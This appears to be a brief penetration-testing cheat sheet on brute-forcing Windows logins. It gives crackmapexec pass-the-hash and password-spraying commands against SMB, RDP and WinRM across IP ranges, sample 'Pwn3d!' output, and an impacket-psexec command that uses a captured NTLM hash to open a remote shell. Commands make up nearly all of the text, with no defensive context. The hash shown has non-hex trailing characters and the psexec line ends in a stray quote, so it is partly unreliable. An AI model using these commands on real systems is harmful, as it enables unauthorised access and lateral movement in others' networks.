# password/hash bruteforcing

## password/hash bruteforcing

* crackmapexec smb -H ee0c207898a5bccc01f38115019ca2fb -u administrator --local-auth 10.21.1.20-24
  * example output: **SCLIENT\administrator:ee0c207898a5bccc01f38115019ca2fbtrew (Pwn3d!) - already compromised SCLIENT7\administrator:ee0c207898a5bccc01f38115019ca2fbtrew (Pwn3d!)**
  * impacket-psexec 'SCLIENT7/administrator\@10.21.1.24' -hashes ':ee0c207898a5bccc01f38115019ca2fbtrew’
* Also , when machine is part of Domain
  * crackmapexec smb -p Test! -u sario -d NETMED 172.16.124.82-83
* Other service
  * RDP
    * crackmapexec rdp -p Test! -u sario -d NETMED 172.16.124.82-83
  * Winrm
    * crackmapexec winrm -p Test! -u sario -d NETMED 172.16.124.82-83